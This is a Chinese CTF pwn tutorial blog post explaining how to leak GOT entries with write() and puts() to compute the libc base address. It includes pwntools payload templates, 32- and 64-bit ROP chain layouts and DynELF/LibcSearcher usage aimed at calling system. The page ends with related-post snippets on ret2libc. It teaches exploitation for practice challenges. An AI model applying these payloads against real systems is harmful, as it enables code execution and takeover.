【PWN学习】如何获取libc基址

最新推荐文章于 2024-09-21 15:06:24 发布
最新推荐文章于 2024-09-21 15:06:24 发布
阅读量8.8k 收藏 44
点赞数 15
分类专栏: pwn学习 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Morphy_Amo/article/details/121845113
版权
本文详细解析了在pwn(程序错误利用)中,如何利用write()和puts()函数泄露got表中函数的实际地址,以获取libc基址。通过构造payload,结合函数调用机制,展示了在32位和64位Linux环境下,如何构造调用链来泄露和计算libc基址。此外,还讨论了在已知和未知libc版本情况下,如何获取函数在libc中的偏移量。
摘要由CSDN通过智能技术生成

目录


在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。

使用Write()泄露函数实际地址

  • 头文件: #include <unistd.h>

  • 定义函数:ssize_t write (int fd, const void * buf, size_t count);

  • **函数说明:write()会把参数buf 所指的内存写入count 个字节到参数fd 所指的文件内. 当然, 文件读写位置也会随之移动.**write函数的特点在于其输出完全由其参数size决定,只要目标地址可读,size填多少就输出多少,不会受到诸如‘\0’, ‘\n’之类的字符影响。因此leak函数中对数据的读取和处理较为简单。

    • 第一个参数fd=1:标准输出 STDOUT

  • 返回值:如果顺利write()会返回实际写入的字节数. 当有错误发生时则返回-1, 错误代码存入errno 中.

  • Payload:‘a’ * 栈大小 + ebp + write_plt_addr + write执行后的返回地址 + fd + 要泄露的地址 + count

    from pwn import *
elf = ELF('./elf_file')
def leak(addr):
    payload = b''
    payload += b'a' * 0x88			 # 栈的大小
    payload += b'a' * 0x4 			 # ebp
    payload += p32(write_plt)    # write地址
    payload += p32(main_addr)    # 返回地址
    payload += p32(1)       # 第一个参数 fd
    payload += p32(addr)    # 第二个参数 buf   通常可以为write_got
    payload += p32(4)       # 第三个参数 size
    conn.sendlineafter(b'Input:\n',payload)
    content = conn.recv()[:4]
    print("%#x -> %s" %(addr, binascii.b2a_hex((content or ''))))
    return content

d = DynELF(leak, elf = elf)
system_addr = d.lookup('__libc_system', 'libc')
log.success("system:"+hex(system_addr))

使用Puts()泄露函数实际地址

  • 头文件: #include<stdio.h>

  • 定义函数:int puts(const char *string);

  • 函数说明: puts()函数只能够输出字符串,以’\0’来确定字符串的结尾。

  • Payload:

    payload = b''
payload += b'a' * 0x  			# 栈的大小
payload += p64(0) 	  			# ebp
payload += p64(pop_rdi)			# 给puts()函数赋值
payload += p64(addr)				# leak函数的参数addr  可以为puts_got
payload += p64(puts_plt)		# puts函数地址

为什么利用write()puts()函数来获取libc基址时,要泄露got表中函数的地址?

通过学习GOT和PLT的知识,了解到当函数被调用过之后,GOT表中存放的函数地址就是函数的实际地址。而这个地址是通过以下方式确定的
函 数 的 实 际 地 址 = l i b c 基 址 + 函 数 在 l i b c 中 偏 移 量 函数的实际地址 = libc基址 + 函数在libc中偏移量 =libc+libc
因此利用GOT泄露的函数实际地址,和函数在libc中的偏移量就可以计算出libc的基址。

如何获取函数在libc中的偏移量呢?

这里可能有两种情况,一种是libc已知,一种是libc未知。

libc已知

libc已知的情况,可以通过反编译libc获取地址。如下所示,利用radare分析libc文件,可以获取libc中write的偏移地址是0x000d43c0

[0x000187c0]> afl | grep write
0x00063880   22 406  -> 395  sym._IO_wdo_write
0x000d43c0    5 101          sym.__write

也可以通过pwntools的ELF类,加载libc文件来获取目标函数的偏移地址。

libc= ELF('./libc_32.so.6')

libc_write_offset = libc.sym['write']

libc未知

libc未知的情况下,需要确定libc的版本号。同一个版本的libc对应的函数的实际地址是一样的,因此通过收集所有libc库的实际函数的地址,就利用泄露的函数的实际地址确定libc版本,从而进一步获取libc中函数的偏移地址。

pwn中可以使用LibSearcher库

from LibcSearcher import *

...
# leak是使用write或put进行地址泄露的函数
write = leak(write_got)
libc = LibcSearcher('write', write)
libcbase = write - libc.dump('write')

为什么write和putS在泄露基址的时候是这样构造payload?

根据前面的分析,我们知道我们要泄露的是GOT表的地址,需要利用WRITE和PUTS输出数据的能力。

假设要泄露的是函数func的地址,我们需要构造write(1, func_got_addr, 4)或者puts(func_got_addr)

32位Linux

32位Linux是用栈传递参数的,如果将write(1, func_got_addr, 4)编译成汇编,大概的运行流程如下

push 4
lea rax, [func_got_addr]
push rax
push 1
call write

我们知道栈是先进后出的,因此在写payload的时候需要将这个过程反过来,就变成了如下所示

payload = padding 	# 栈填充字段 
paylaod += ebp			# callee的ebp
payload += write_plt地址
payload += write运行后返回地址
payload += write的第一个参数_1
payload += write的第二个参数_func_got_addr
payload += write的第三个参数_4

同样的,如果是用puts的话payload只需要传入一个参数

payload = padding 	# 栈填充字段 
paylaod += ebp			# callee的ebp
payload += puts调用地址
payload += puts运行后返回地址
payload += puts的参数_func_got_addr

64位Linux

64位Linux前六个参数是使用rdi, rsi, rdx, rcs, r8, r9 传递的。

lea rdi, [func_got_addr]
call puts

这里不是使用栈,因此在构造payload的时候需要按顺序构造调用链。我们需要把要泄露的地址func_got_addr放到rdi寄存器中。如何做到呢?我们先来分析学习一下puts的payload

payload = b''
payload += b'a' * 0xN  			# 栈的大小
payload += p64(0) 	  			# ebp
payload += p64(pop_rdi)			# 给puts()函数赋值
payload += p64(addr)				# 要泄露的函数的地址func_got_addr
payload += p64(puts_plt)		# puts函数地址

payload发送后,当执行到预设返回地址时,栈中的情况如下所示

sp ------- 		  | pop_rdi的地址 |
				  | func_got_addr|
				  | puts_plt地址  |

此时程序跳转到pop rdi的位置执行,

pop rdi
ret

而栈指针出栈后,将下移一步。

				  | pop_rdi的地址 |
sp -------        | func_got_addr|
				  | puts_plt地址  |

程序接下来执行pop rdi,将栈指针当前所指弹出,存入rdi中。这样一来,成功将func_got_addr放入了rdi中。执行后sp继续下移一帧,指向了puts_plt地址

				  | pop_rdi的地址 |
				  | func_got_addr|
sp -------        | puts_plt地址  |

下一步,程序将执行ret。ret相当于执行了pop ip,将当前栈指针指向的内存地址的内容存入ip寄存器中。因此puts_plt的地址将被加载到指令寄存器里,等待执行。

到此为止即完成puts(func_got_addr)的调用。

从这里也可以学习到gadget的构造方式,pop reg后紧跟要放入reg中的数据,即可成功给reg赋值。

利用上面学习到的方式,下面尝试构造利用write进行泄露的payload。我们希望构成如下的调用链

mov rdx, 4
lea rsi, [func_got_addr]
mov rdi, 1
call write

payload = padding			# 填充栈
payload += p64(0)			# rbp
payload += p64(pop_rdx) + p64(0x8)
payload += p64(pop_rsi) + p64(func_got_addr)
payload += p64(pop_rdi) + p64(0x1)
payload += p64(write_plt)

当然直接找到下面三个gadget,是一种理想情况

pop rdx; ret
pop rsi; ret
pop rdi; ret

大多数情况找不到这么完美的gadget的,这是就需要使用万能gadget来构造调用链,这部分内容以后再来学习。

Morphy_Amo
关注
专栏目录
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8394
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
CTF|pwn栈溢出入门题level3解题思路及个人总结
skyattractive的博客
06-02 2419
CTF|pwn栈溢出入门题level3解题思路及个人总结 解题思路 拿到题目将文件下载下来拖入ubuntu 发现这一次的文件比较特殊:是一个linux环境下的压缩包,自然而然想到的是解压它 通过命令行tar -xvf level.tar 将其解压出来 发现有两个文件:level和libc 都拖入IDA 特殊的地方在:本题没有直接给出system和bin/sh的位置,但是文件中有个write函数可以利用 我们IDA打开libc文件(关于libc文件是什么有什么 会在总结写到) 总体思路为:我们通过r
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
pwn 更改pwnlibc保姆级教程★
最新发布
YX-hueimie
09-21 1467
现在市面上有很多关于改libc的教程,但是基本有以下几个问题:没有符号表、错误、过时、繁琐、高版本不适用。于是我找了一种最简单并且全libc通用的方法。现分享如下。
泄漏libc基地址
yjh_fnu_ltn的博客
06-01 1166
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
Linux pwn入门教程(5)——利用漏洞获取libc
子曰小玖的博客
06-04 1978
https://bbs.ichunqiu.com/thread-42933-1-1.html?from=aqzx1 0x00 DynELF简介 在前面几篇文章中,为了降低难度,很多通过调用库函数system的题目我们实际上都故意留了后门或者提供了目标系统的libc版本。我们知道,不同版本的libc,函数首地址相对于文件开头的偏移和函数间的偏移不一定一致。所以如果题目不提供libc...
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 710
pwn 64位 泄露libc版本
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2377
libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2816
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
ret2libc
huzai9527的博客
02-03 494
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
ctfshow pwn3
qq_39980610的博客
08-19 603
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
PWN入门之libc
weixin_44681716的博客
03-24 2774
这次的实验的前提的我们不知道system和bin/sh的函数,然后通过泄露某个函数在libc表中的地址,再加上这几个函数的偏移量来计算system和bin/sh的地址,最后将这个地址覆盖到ret上,以便能跳至我们想要的函数,最终获得shellcode 我们还是以pwn举例 1、 ...
pwn 查看陌生libc的版本
yongbaoii的博客
05-07 1681
我们经常在做一些pwn题的时候需要知道它的libc版本 因为不同的版本会有不同的影响,libc-2.24之后vtable多了检查,libc-2.27之后多了tcache。 那么题目给一个陌生的libc怎么知道它对应的版本? 拖到IDA里面。然后在字符串窗口搜索GNU就好了。 ...
linux 获取 基地址,linux - 每个函数加载的glibc基地址不同。 - SO中文参考 - www.soinside.com...
weixin_39601794的博客
05-14 818
我试图计算一个二进制文件的库的基地址.我有printf,putes ecc的地址,然后我减去它的偏移量,得到库的基地址.我对printf,putes和signal这样做,但每次我得到的基地址都不一样。这个 帖子,但我也无法得到正确的结果。ASLR被禁用。这是我取函数库地址的地方。gdb-peda$ x/20wx 0x804b0180x804b018 : 0xf7e05720 0x...
PWN做题笔记9-dice_game(调用libc库方法)
qq_40923256的博客
04-26 635
本题与“4”没有本质区别,这里说一下数组在栈中的存放以及libc库方法直接调用 buf数组大小55,但是读了0x50即80个字节,存在溢出 栈中数组元素存放如下: 因此构造payload覆盖seed地址变为0 可以利用ctypes库直接调用libc库中的方法。 代码如下: from pwn import * from ctypes import * p=remote("111.200.241.244","55029") payload=b"a"*0x40+p64(0) p.s.
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1362
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
PWN计算libc偏移
sagic的博客
07-18 206
已知__libc_start_main+240。用stack地址-vmmap地址得出偏移。首先程序进行一定的运行查看stack。所以在libc.sym中要-240。还是帕鲁杯2024Palu为例。以帕鲁杯2024Palu为例。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Morphy_Amo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值